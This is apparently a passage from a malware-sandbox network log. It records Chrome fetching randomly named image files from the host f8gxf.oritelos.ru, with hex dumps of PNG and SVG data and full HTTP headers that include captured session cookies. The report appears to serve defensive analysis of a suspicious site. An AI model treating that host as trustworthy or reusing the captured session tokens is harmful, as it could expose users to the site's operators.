                                                2024-05-30 10:21:14 UTC709INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                2024-05-30 10:21:14 UTC1369INData Raw: 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3
                                                Data Ascii: "I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$
                                                2024-05-30 10:21:14 UTC1369INData Raw: 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd
                                                Data Ascii: gPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:H
                                                2024-05-30 10:21:14 UTC1369INData Raw: 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2
                                                Data Ascii: @9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0
                                                2024-05-30 10:21:14 UTC1369INData Raw: 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba
                                                Data Ascii: (Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\
                                                2024-05-30 10:21:14 UTC1369INData Raw: 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26
                                                Data Ascii: F3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&
                                                2024-05-30 10:21:14 UTC1369INData Raw: 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b
                                                Data Ascii: I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;
                                                2024-05-30 10:21:14 UTC1369INData Raw: 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21
                                                Data Ascii: JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!
                                                2024-05-30 10:21:14 UTC1369INData Raw: 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4
                                                Data Ascii: ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|
                                                2024-05-30 10:21:14 UTC79INData Raw: 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44
                                                Data Ascii: I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                58192.168.2.449808188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1118OUTGET /ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:14 UTC661INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:14 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D2JCMp%2ByHFPG3OUfId5exs5ah1KlYMGDhyFm09o7Fk%2FkAMnUIxuMGawuumfgo2Uh7EoUb3QKMtRWEK%2FfcsrhpIy3GVf8qH7qFYwxSc3wU%2BZSITFcOf7NL2%2BGlO1ffQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff029c9741ad-EWR
                                                2024-05-30 10:21:14 UTC708INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                2024-05-30 10:21:14 UTC1369INData Raw: 2e 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30
                                                Data Ascii: .9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.600
                                                2024-05-30 10:21:14 UTC1369INData Raw: 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35
                                                Data Ascii: C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.695
                                                2024-05-30 10:21:14 UTC1369INData Raw: 32 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30
                                                Data Ascii: 24L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.50
                                                2024-05-30 10:21:14 UTC1369INData Raw: 2e 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33
                                                Data Ascii: .7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3
                                                2024-05-30 10:21:14 UTC1214INData Raw: 20 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31
                                                Data Ascii: 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 1
                                                2024-05-30 10:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                59192.168.2.449809188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:14 UTC1132OUTGET /yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:15 UTC679INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:15 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QWh1V2ieaIRo%2BhdoffSJWdCl15j89EpmZ7iPFb8OIpR%2BexNHqEzvDAKgs%2BqrEwifQbhBfgNeSMhIIXsDr%2B%2Bh2%2FmNFAMFT54okX8SM8gat7Fcye2MWA%2FRUYjA1Ynw1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff052e4e42ad-EWR
